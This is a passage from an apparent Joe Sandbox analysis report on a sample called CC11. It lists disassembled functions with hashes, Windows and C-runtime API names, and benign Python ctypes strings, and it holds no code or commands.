                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                  • Instruction Fuzzy Hash: 53116DA3E5CB1221F6761139E857B791141EF5C364F2506F4EA6E867DECE6CE8418310
                                                                                                                                                                  APIs
                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6BF
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6DE
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A706
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A717
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A728
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                  • Instruction ID: dd8688bed2fa91b585d41e487b2597ff2ec506bacc46b63a910c6d50682fe892
                                                                                                                                                                  • Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F116D20B0C682A2FA78A33959455796191EF9A3A0F1443B4E83D877DEEE2CF9038704
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                  • Instruction ID: 2ae81bc4248d244abe9a45e4bc44f5fc3d06ef8dbb0b98bf6e80129f9962475b
                                                                                                                                                                  • Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                                                                                                                                  • Instruction Fuzzy Hash: AC112A60E4C647A2F978A33D48555BA2682DF5A370F5847B4D93ECA3DEED2CF4038241
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3617616757-0
                                                                                                                                                                  • Opcode ID: 5eb91d6f8006a15464dad167b52d77913745de2aead0a031361b304b3ea450c4
                                                                                                                                                                  • Instruction ID: 19b753ff147c0abe8d21786f95f75eb6b0352e95203efb16c51708065ed4a929
                                                                                                                                                                  • Opcode Fuzzy Hash: 5eb91d6f8006a15464dad167b52d77913745de2aead0a031361b304b3ea450c4
                                                                                                                                                                  • Instruction Fuzzy Hash: F4113672E06A4285FF949FB988A53B823A0BF94BE9F084230CF0D4A5528F2C9449C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                  • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                  • Instruction ID: eb54a1ac6184a59909325f8c75781b4a4b7c8bc66e784d2ab2d15e62ae36a6ef
                                                                                                                                                                  • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                  • Instruction Fuzzy Hash: 8391CF32E08A46A1E7319E39D45037D7395EB44B9AF8841B6DA5DC73D9EF3CE8468304
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                  • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                  • Instruction ID: 5e23132d9c985f3899df5f995a59a8db4605dca690be926f55aa1c8e3b45f56f
                                                                                                                                                                  • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                  • Instruction Fuzzy Hash: 86817F72E08243E5FB744E3DC2902793AA0EB11B88F5580B5DA09D779EDF2DE9439701
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                  • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                  • Instruction ID: fb55907f387caae917aad7023664dd6efa0a123574666d35b35858e6805daa08
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                  • Instruction Fuzzy Hash: BB51AD32B19646AADBA4CB25E484E797795EB44B8CF548170EA4EC378CEF7DE841C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                  • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                  • Instruction ID: 794027cd627189bd3dadbf55c10aea86a09c4ba0f4ab54a2f7751203738c363d
                                                                                                                                                                  • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                  • Instruction Fuzzy Hash: AA618332908BC5D6D7719B25E4407AEBBA0FB85798F044265EB9C43B99DF7CE190CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                  • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                  • Instruction ID: 3fd517f166474d67959c88066563b432a082f811e25dd9fb4666c7e2419afad4
                                                                                                                                                                  • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                  • Instruction Fuzzy Hash: 11517F36A08382E6EBB48B31944436C7BA0FB65B98F584176DA5D87BD9CF3CE451CB01
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF69001324C,?,?,00007FF690013964), ref: 00007FF690017642
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                  • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                  • Instruction ID: c0ecfcf65468bedfb534fe0e40f4d484c8ca3ea1439c6a524bb5eb6e3a5c1f4c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31E82171DAC1A5EA719B34E8507EA6265FB88BE8F404271EE6D837CDDF3CD6418700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                  • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                  • API String ID: 1878133881-653037927
                                                                                                                                                                  • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                  • Instruction ID: 33221a58fbb2fdf55098bcd9f466b3ff1a022d4ea694a439cd0533ccf5d5716e
                                                                                                                                                                  • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                  • Instruction Fuzzy Hash: DE116D72628B85A1EA718B20F451BA93364FB48B88F905175EB5D97788DF7CD605C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                  • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                  • API String ID: 1878133881-2698358428
                                                                                                                                                                  • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                  • Instruction ID: e1d9295304c5a4139dc5b94108194141179b88569957d767db62f109107c1a72
                                                                                                                                                                  • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                  • Instruction Fuzzy Hash: 98119A72628B85A1EA718B20F451BA93368FB48B88F901176EB8C97748DF3CD609C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_StringSubtypeType_
                                                                                                                                                                  • String ID: can't delete attribute$not a ctype instance
                                                                                                                                                                  • API String ID: 468607378-2740123057
                                                                                                                                                                  • Opcode ID: 1fafcbcae81ec3fd018d3d4226a6b337f39236e74224f4e96270f17a336483e8
                                                                                                                                                                  • Instruction ID: 64e050082186bdd3097e9dade199d14b929b3aa92ceb331c33b0e011ea5a9042
                                                                                                                                                                  • Opcode Fuzzy Hash: 1fafcbcae81ec3fd018d3d4226a6b337f39236e74224f4e96270f17a336483e8
                                                                                                                                                                  • Instruction Fuzzy Hash: 50113C62B09B8581EB10CF9AE4800696764FF88FE4B148532EF9D47B69DF3CD491C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • bytes or integer address expected instead of %s instance, xrefs: 00007FF8BFB77033
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Long$Bytes_Err_FormatLong_MaskStringUnsigned
                                                                                                                                                                  • String ID: bytes or integer address expected instead of %s instance
                                                                                                                                                                  • API String ID: 1546367030-706233300
                                                                                                                                                                  • Opcode ID: c5b2b3cdae5104d5393cc6efd3c4e60599be666788a45162c92a9ba1b46f74d2
                                                                                                                                                                  • Instruction ID: 196f5e872d13cd96e5e3e21ba8753c732fe00efa2aaffd81e7e8fcc6d1621934
                                                                                                                                                                  • Opcode Fuzzy Hash: c5b2b3cdae5104d5393cc6efd3c4e60599be666788a45162c92a9ba1b46f74d2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11D376A1AA46C1EB549F9AE8802783771FB99BD4F148532CB4E83361DE3CE495C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AuditErr_StringSys_
                                                                                                                                                                  • String ID: abstract class$ctypes.cdata
                                                                                                                                                                  • API String ID: 1384585920-3531133667
                                                                                                                                                                  • Opcode ID: 6c986b24c207993e7dc52169703a89036ea5d551520a2863b80b1632265cef16
                                                                                                                                                                  • Instruction ID: 122a6579531ed1f338c884c537cf13dcc02556c5bd24cba71d61de5db68573f2
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c986b24c207993e7dc52169703a89036ea5d551520a2863b80b1632265cef16
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F011722B19B4281EB44DB9AE9541796BA5FBC8FC4B088035DB4D97765EF2CE455C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_StringSubtypeType_
                                                                                                                                                                  • String ID: expected CData instance
                                                                                                                                                                  • API String ID: 468607378-1581534645
                                                                                                                                                                  • Opcode ID: 18eac365da9da82c7be5fa6ddf0301b549dbff12dc4289c0220c4cf0942324f5
                                                                                                                                                                  • Instruction ID: 705635ad2a164d95a6879a40154b42cdacc466e8848c15e33c706c2d3eb9adea
                                                                                                                                                                  • Opcode Fuzzy Hash: 18eac365da9da82c7be5fa6ddf0301b549dbff12dc4289c0220c4cf0942324f5
                                                                                                                                                                  • Instruction Fuzzy Hash: A3012861A09B0781EB54AFEDD84017837A4FF89BC4B280531CB2E867A1EF3DE596C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_LongLong_MaskStringUnicode_Unsigned
                                                                                                                                                                  • String ID: function name must be string, bytes object or integer
                                                                                                                                                                  • API String ID: 2115587880-3177123413
                                                                                                                                                                  • Opcode ID: 25a9809bc0b9a84059b6088b3c6c508c1e875b89492b4433713f89c9c7ab522e
                                                                                                                                                                  • Instruction ID: c8fc017e3be139365b0bea0cae146da9e9c582c13729d5b71627d2c5ce603e19
                                                                                                                                                                  • Opcode Fuzzy Hash: 25a9809bc0b9a84059b6088b3c6c508c1e875b89492b4433713f89c9c7ab522e
                                                                                                                                                                  • Instruction Fuzzy Hash: 0101A422B1AB06C1FB195FEED8545793751AF88BD5F048430C64D86B61DE3CA091C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
